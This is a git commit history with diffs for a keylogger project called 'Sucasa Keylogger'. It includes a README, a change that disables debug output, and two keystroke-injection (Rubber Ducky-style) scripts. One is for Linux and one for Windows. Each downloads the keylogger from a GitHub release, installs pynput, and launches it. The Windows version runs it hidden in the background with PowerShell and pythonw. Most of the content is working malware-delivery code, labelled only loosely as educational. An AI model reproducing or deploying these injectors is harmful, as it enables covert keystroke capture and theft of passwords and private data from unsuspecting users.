5 Commits

Author SHA1 Message Date
Jessi 31d6cb30aa Update README 2023-10-21 15:11:05 -07:00
Jessi McKissick feb0495011 Added injector file for windows
Uses powershell and pythonw to background the process.
2023-10-21 15:08:43 -07:00
Jessi 2102377005 disabled defaulted debug 2023-10-21 13:45:06 -07:00
Jessi 06254e9f02 Update README 2023-06-28 05:42:06 -07:00
Jessi d0e3b2cd0d Added simple injector and README 2023-06-28 05:37:49 -07:00
4 changed files with 49 additions and 1 deletions
+7
View File
@@ -0,0 +1,7 @@
# Sucasa Keylogger
## These scripts are provided as-is with no guarantee of quality and only for use as educational tools.
------
As of the moment the script will work about anywhere with python installed but the injector only works on linux distributions with wget or windows systems with powershell available,
basic script execution possible, etc.
Assisted injection method coming soon! (Usb loaded with relevant files + rubber ducky combo for systems incapable of pulling data from remotes and the likes.)
+1 -1
View File
@@ -4,7 +4,7 @@ import random
import datetime
dat = "" # Holds all the data from target input
dbg = True # Wether or not its on debug mode
dbg = False # Wether or not its on debug mode
log = True # Wether or not it will generate logs
id = 0 # If logs are enabled (default yes) this will hold the ID generated on script start
+12
View File
@@ -0,0 +1,12 @@
REM Author: JAM
REM Description: Downloads and enables the sucasa keylogger
REM Version: 1.0
REM Category: Execution
STRING wget https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py
ENTER
DELAY 750
STRING pip install pynput
ENTER
DELAY 500
STRING python3 sucasa.py
ENTER
+29
View File
@@ -0,0 +1,29 @@
REM Author: JAM
REM Description: Downloads and enables the sucasa keylogger on windows
REM Version: 1.0
REM Category: Execution
GUI r
DELAY 2000
STRING powershell
ENTER
DELAY 4000
STRING $source = "https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py"
ENTER
DELAY 1000
STRING $destination = "$env:USERPROFILE\sucasa.py"
ENTER
DELAY 1000
STRING $client = new-object System.Net.WebClient
ENTER
DELAY 1000
STRING $client.DownloadFile($source,$destination)
ENTER
DELAY 1000
STRING pip install pynput
ENTER
DELAY 3000
STRING Start-Process -NoNewWindow pythonw $env:USERPROFILE\sucasa.py
ENTER
DELAY 1000
STRING exit
ENTER